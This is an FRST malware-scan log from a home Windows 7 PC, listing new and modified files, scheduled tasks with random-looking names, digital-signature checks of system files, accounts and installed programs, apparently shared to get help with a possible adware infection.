2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Users\Martin\AppData\Roaming\LookUpPro
2018-03-01 17:09 - 2018-03-01 17:23 - 000000000 ____D C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06
2018-03-01 17:09 - 2018-03-01 17:09 - 000024450 _____ C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
2018-03-01 17:09 - 2018-03-01 17:09 - 000003060 _____ C:\Windows\System32\Tasks\OHurYzwpfZsLsh
2018-03-01 17:09 - 2018-03-01 17:09 - 000002872 _____ C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2
2018-03-01 17:09 - 2018-03-01 17:09 - 000002860 _____ C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2
2018-03-01 17:09 - 2018-03-01 17:09 - 000002850 _____ C:\Windows\System32\Tasks\wXkHuguozQzssiw2
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-02 08:02 - 000000000 ____D C:\Program Files\K3QPCMS68Z
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:23 - 000000000 ____D C:\Program Files (x86)\One
2018-03-01 17:08 - 2018-03-01 17:14 - 000000000 ____D C:\Users\Martin\AppData\Roaming\eiab2yplwq4
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ C:\Users\Martin\AppData\Local\installer.dat
2018-03-01 11:52 - 2018-03-01 11:52 - 000088024 _____ C:\Windows\system32\Drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys
2018-03-01 11:52 - 2018-03-01 11:52 - 000041224 _____ C:\Windows\uninstaller.dat
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\LastGood.Tmp
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-02 12:09 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:15 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2016-11-17 11:34 - 000003490 _____ C:\Windows\System32\Tasks\AutoKMS
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 11:12 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:06 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-01 17:06 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals
2018-02-17 14:54 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2018-02-17 13:46 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\AppCompat
2018-02-16 15:48 - 2013-10-17 21:57 - 008083703 _____ C:\Windows\system32\nvcoproc.bin

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ () C:\Users\Martin\AppData\Local\installer.dat
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

Some files in TEMP:
====================
2018-03-02 10:21 - 2014-02-01 00:01 - 000585520 ____N (Actual Tools) C:\Users\Martin\AppData\Local\Temp\ammemb.dll
2014-12-06 21:09 - 2014-02-01 00:01 - 001790768 ____N (Actual Tools) C:\Users\Martin\AppData\Local\Temp\ammemb64.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (18-03-2018 09:05:59)
Running from D:\User profile\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-10-17 20:32:57)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1755371218-3412237994-1746218496-500 - Administrator - Disabled)
Guest (S-1-5-21-1755371218-3412237994-1746218496-501 - Limited - Disabled)
Martin (S-1-5-21-1755371218-3412237994-1746218496-1000 - Administrator - Enabled) => C:\Users\Martin

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Actual Multiple Monitors 8.1.1 (HKLM-x32\...\Actual Multiple Monitors_is1) (Version: 8.1.1 - Actual Tools)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.161 - Adobe Systems Incorporated)
Alien Isolation (HKLM-x32\...\Alien Isolation_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\{761CB033-D425-4A16-954D-EA8DEF4D053B}) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\ArcGIS 10.2.2 for Desktop) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
Audiobook Cutter Free Edition (HKLM-x32\...\{7B460E9F-8AEC-4A46-81D5-25A3D15365F1}) (Version: 1.9.3 - Audiobook Software)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BFME2 All-In-One Patch Installer & Switcher version 1.0 (HKLM-x32\...\{B258BEC7-DFB5-4DDC-BA90-BF02B91CA0C6}_is1) (Version: 1.0 - dijkstra & forshire)
Breach (HKLM\...\UDK-640527a6-bd3d-4ff1-8130-b9100ba72023) (Version:  - Epic Games, Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
CloneCD (HKLM-x32\...\CloneCD) (Version:  - SlySoft)
Commandos 2 and 3 (HKLM-x32\...\GOGPACKCOMMANDOS23_is1) (Version: 2.0.0.15 - GOG.com)
Commandos Ammo Pack (HKLM-x32\...\GOGPACKCOMMANDOS1_is1) (Version: 2.0.0.19 - GOG.com)
Company of Heroes (HKLM-x32\...\{BA801B94-C28D-46EE-B806-E1E021A3D519}) (Version: 1.0.0.78 - THQ Inc.)
Core Temp 1.0 RC6 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.0 - Alcpu)
Cossacks 3 (HKLM-x32\...\1797227701_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks 3: Guardians of the Highlands (HKLM-x32\...\1483750963_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks Anthology (HKLM-x32\...\Cossacks Anthology_is1) (Version:  - GOG.com)
Cuphead (HKLM-x32\...\1963513391_is1) (Version: hotfix_1.1.4 - GOG.com)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0337 - Disc Soft Ltd)
Dark Reign + Expansion (HKLM-x32\...\GOGPACKDARKREIGN_is1) (Version: 2.0.0.41 - GOG.com)
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Diaspora version 1.1.1 (HKLM-x32\...\{1F5ABAAA-6D61-4FC1-A595-86CBA5517E7A}_is1) (Version: 1.1.1 - Diaspora Development)
Discord (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Discord) (Version: 0.0.300 - Discord Inc.)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 391.01 - NVIDIA Corporation) Hidden
DisplayFusion 5.1.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 5.1.1.0 - Binary Fortress Software)
Distrust (HKLM-x32\...\Distrust_is1) (Version:  - )
Divinity - Original Sin Enhanced Edition (HKLM-x32\...\1445516929_is1) (Version: 2.5.0.12 - GOG.com)
Divinity Original Sin 2 (HKLM-x32\...\Divinity Original Sin 2_is1) (Version:  - )
Dolphin VR 4.0 (HKLM-x32\...\Dolphin) (Version: 4.0 - Dolphin Team)
Doom (HKLM-x32\...\{B6A2B3BA-C93E-4AEE-BBCF-BE91DDC84962}_is1) (Version:  - id Software)
EasyLog USB (HKLM-x32\...\{4F84DDD2-7468-4771-9906-3552521CE796}) (Version: 6.8.0 - Lascar Electronics Ltd.)
Elite Dangerous Launcher version 0.4.5499.0 (HKLM-x32\...\{696F8871-C91D-4CB1-825D-36BE18065575}_is1) (Version: 0.4.5499.0 - Frontier Developments)
Enter the Gungeon (HKLM-x32\...\1456912569_is1) (Version: 2.7.0.9 - GOG.com)
EVEMon (HKLM-x32\...\EVEMon) (Version: 2.2.3 - battleclinic.com)
EVERSPACE (HKLM-x32\...\1513949567_is1) (Version: 2.0.0.2 - GOG.com)
Exact Audio Copy 1.3 (HKLM-x32\...\Exact Audio Copy) (Version: 1.3 - Andre Wiethoff)
f.lux (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Flux) (Version:  - f.lux Software LLC)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Game of Thrones Episode 6 (HKLM-x32\...\Game of Thrones Episode 6_is1) (Version:  - )
GameRanger (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\GameRanger) (Version:  - GameRanger Technologies)
Gauntlet Slayer Edition (HKLM-x32\...\Gauntlet Slayer Edition_is1) (Version:  - )
GOG.com Commandos 2 (HKLM\...\{c1a036f7-30df-46e5-b5a3-c5e67039e947}.sdb) (Version:  - )
GOG.com Heroes of Might and Magic 3 (HKLM\...\{1d3c859c-1028-4822-b0a7-da4f7bbc18bc}.sdb) (Version:  - )
GOG.com The Settlers 3 (HKLM\...\{f707a2f1-2ed1-4560-a087-97aa176c3777}.sdb) (Version:  - )
GOG.com Unreal Tournament GOTY (HKLM\...\{fa491d91-322c-4059-a1f7-4a79782edee8}.sdb) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 64.0.3282.186 - Google Inc.)
Google Earth Pro (HKLM-x32\...\{FA1BBF34-E994-4310-95D7-BE93092B8E61}) (Version: 7.3.1.4507 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Hammerwatch (HKLM-x32\...\GOGPACKHAMMERWATCH_is1) (Version: 2.3.0.6 - GOG.com)
Hand of Fate - Wildcards (HKLM-x32\...\Hand of Fate: Wildcards_is1) (Version: 2.3.0.7 - GOG.com)
Hand of Fate (HKLM-x32\...\1424100574_is1) (Version: 2.4.0.8 - GOG.com)
Hand of Fate 2 (HKLM\...\aGFuZG9mZmF0ZTI_is1) (Version: 1 - )
Handset USB Driver (HKLM\...\{D2D77DC2-8299-11D1-8949-444553540000}_is1) (Version: 5.2066.1.A14B04 - )
HCS Voice Pack version 1.6.2 (HKLM-x32\...\{CEAF7641-D8E3-41C2-9D26-13D1DE9E6EF7}_is1) (Version: 1.6.2 - HCS Voice Packs)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
HELLDIVERS (HKLM-x32\...\HELLDIVERS_is1) (Version:  - )
Heroes & Generals (HKLM-x32\...\Heroes & Generals) (Version: 1.0.6.1 - Reto-Moto)
Heroes of Might and Magic 3 Complete (HKLM-x32\...\GOGPACKHOMM3COMPLETE_is1) (Version: 2.0.0.16 - GOG.com)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.1.4.6 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
Homeworld Deserts of Kharak (HKLM-x32\...\Homeworld Deserts of Kharak_is1) (Version:  - )
Homeworld Remastered Collection (HKLM-x32\...\SG9tZXdvcmxkUmVtYXN0ZXJlZENvbGxlY3Rpb24=_is1) (Version: 1 - )
How to Survive (HKLM-x32\...\How to Survive_is1) (Version:  - )
How to Survive El Diablo Islands (HKLM-x32\...\How to Survive El Diablo Islands_is1) (Version:  - )
HP Dropbox Plugin (HKLM-x32\...\{23617173-F935-4C17-A323-EB1207F3ED49}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
HP ENVY 4520 series Basic Device Software (HKLM\...\{AA543771-C534-4954-831A-9862C626796F}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP Google Drive Plugin (HKLM-x32\...\{AFF80405-E56A-48E7-98FC-8E46E261949F}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
Hunted - The Demon's Forge (HKLM-x32\...\Hunted - The Demon's Forge_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
iDealshare VideoGo 6.1.1.6250 (HKLM-x32\...\{CC4C06C4-7C78-4AAB-B5AF-33FB11CCD850}_is1) (Version:  - iDealshare Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Java™ 6 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416045FF}) (Version: 6.0.450 - Oracle)
K-Lite Mega Codec Pack 12.9.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.9.0 - KLCP)
Kutools for Excel 11.0.0.228 (HKLM-x32\...\{A095BA43-4A97-4D55-8E25-A0BC46F10765}_is1) (Version: 11.0.0.0 - Detong)
L.A.Noire (HKLM-x32\...\L.A.Noire_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
LaCie Private Public version 1.2 (HKLM\...\{5553AC21-44FC-4F8B-B3BB-3B7E913F465B}_is1) (Version: 1.2 - LaCie Private, Inc.)
Legend of Grimrock 2 (HKLM-x32\...\Legend of Grimrock 2_is1) (Version:  - )
Lightning (HKLM-x32\...\{277C2E30-99C8-40A5-B5F6-A21422ACDB6A}) (Version:  - )
Little Big Adventure (HKLM-x32\...\GOGPACKLBA_is1) (Version: 2.0.0.20 - GOG.com)
Little Big Adventure 2 (HKLM-x32\...\GOGPACKLBA2_is1) (Version: 2.0.0.6 - GOG.com)
Little Nightmares (HKLM-x32\...\Little Nightmares_is1) (Version:  - )
Little Nightmares Secrets of The Maw Chapter 1 (HKLM-x32\...\Little Nightmares Secrets of The Maw Chapter 1_is1) (Version:  - )
LogMeIn Hamachi (HKLM-x32\...\{99A016E1-0840-43AE-8434-A18CEDFA833B}) (Version: 2.2.0.58 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.58 - LogMeIn, Inc.)
LOTR The Return of the King tm (HKLM-x32\...\{6E298B0A-558C-4138-0096-740677B382CD}) (Version:  - )
